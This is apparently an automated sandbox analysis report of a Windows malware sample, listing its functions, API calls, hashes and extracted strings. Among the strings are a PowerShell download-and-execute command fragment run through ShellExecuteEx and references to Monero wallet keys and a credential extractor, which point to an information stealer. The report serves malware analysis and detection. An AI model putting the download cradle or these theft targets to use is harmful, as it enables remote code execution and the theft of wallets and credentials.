                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                          • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                          • Opcode Fuzzy Hash: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                          • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                          Function 00417690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 004176AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0127B7E0,00000000,00020119,00000000), ref: 004176DD
                          • RegQueryValueExA.ADVAPI32(00000000,0128D940,00000000,00000000,?,000000FF), ref: 004176FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                          • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                          • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                          • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                          Function 00417720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0041773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0127B7E0,00000000,00020119,004176B9), ref: 0041775B
                          • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                          • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                          • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                          • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                          • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                          Function 004192E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                          • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                          • CloseHandle.KERNEL32(000000FF), ref: 00419327
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID: :A$:A
                          • API String ID: 1378416451-1974578005
                          • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                          • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                          • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                          • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                          Function 004099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,0040148F,00000000), ref: 00409A5A
                          • LocalFree.KERNEL32(0040148F), ref: 00409A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                          • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                          • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                          • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                          Function 00414780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,0128DC88), ref: 004147DB
                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00418E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00414801
                          • lstrcat.KERNEL32(?,?), ref: 00414820
                          • lstrcat.KERNEL32(?,?), ref: 00414834
                          • lstrcat.KERNEL32(?,0127B2C0), ref: 00414847
                          • lstrcat.KERNEL32(?,?), ref: 0041485B
                          • lstrcat.KERNEL32(?,0128D058), ref: 0041486F
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00401B54,?,?,0042564C,?,?,00420E1F), ref: 00418D9F
                            • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                            • Part of subcall function 00414570: RtlAllocateHeap.NTDLL(00000000), ref: 00414587
                            • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                            • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                          • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                          • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                          • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                          Function 00412C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                          Strings
                          • ')", xrefs: 00412CB3
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                          • <, xrefs: 00412D39
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: a0ed4cbfe93d0cc974da6044f8369c0878916f44a8cf608972f3da16a68e91da
                          • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                          • Opcode Fuzzy Hash: a0ed4cbfe93d0cc974da6044f8369c0878916f44a8cf608972f3da16a68e91da
                          • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                          Function 00409E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 33a59d5addc8aa9e12ca9501259c5ecb4220475e1b0f145cbebf264129199f89
                          • Instruction ID: e68f897518730e97829997f72da4e082462e263544c7bb15c137a409630237ad
                          • Opcode Fuzzy Hash: 33a59d5addc8aa9e12ca9501259c5ecb4220475e1b0f145cbebf264129199f89
                          • Instruction Fuzzy Hash: 57616130A00248EBDB14EFA5DD96FED7775AF40304F408029F90A6F1D1DB786A56CB5A
                          Function 004140B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,0128D398,00000000,00020119,?), ref: 004140F4
                          • RegQueryValueExA.ADVAPI32(?,0128DDD8,00000000,00000000,00000000,000000FF), ref: 00414118
                          • RegCloseKey.ADVAPI32(?), ref: 00414122
                          • lstrcat.KERNEL32(?,00000000), ref: 00414147
                          • lstrcat.KERNEL32(?,0128DBE0), ref: 0041415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                          • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                          • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                          • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                          Function 00417E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00417E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0127BA48,00000000,00020119,?), ref: 00417E5E
                          • RegQueryValueExA.ADVAPI32(?,0128D3D8,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00417E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                          • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                          • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                          • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                          Function 00419260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                          Download Yara Rule
                          APIs
                          • StrStrA.SHLWAPI(0128DA48,?,?,?,0041140C,?,0128DA48,00000000), ref: 0041926C
                          • lstrcpyn.KERNEL32(0064AB88,0128DA48,0128DA48,?,0041140C,?,0128DA48), ref: 00419290
                          • lstrlen.KERNEL32(?,?,0041140C,?,0128DA48), ref: 004192A7
                          • wsprintfA.USER32 ref: 004192C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
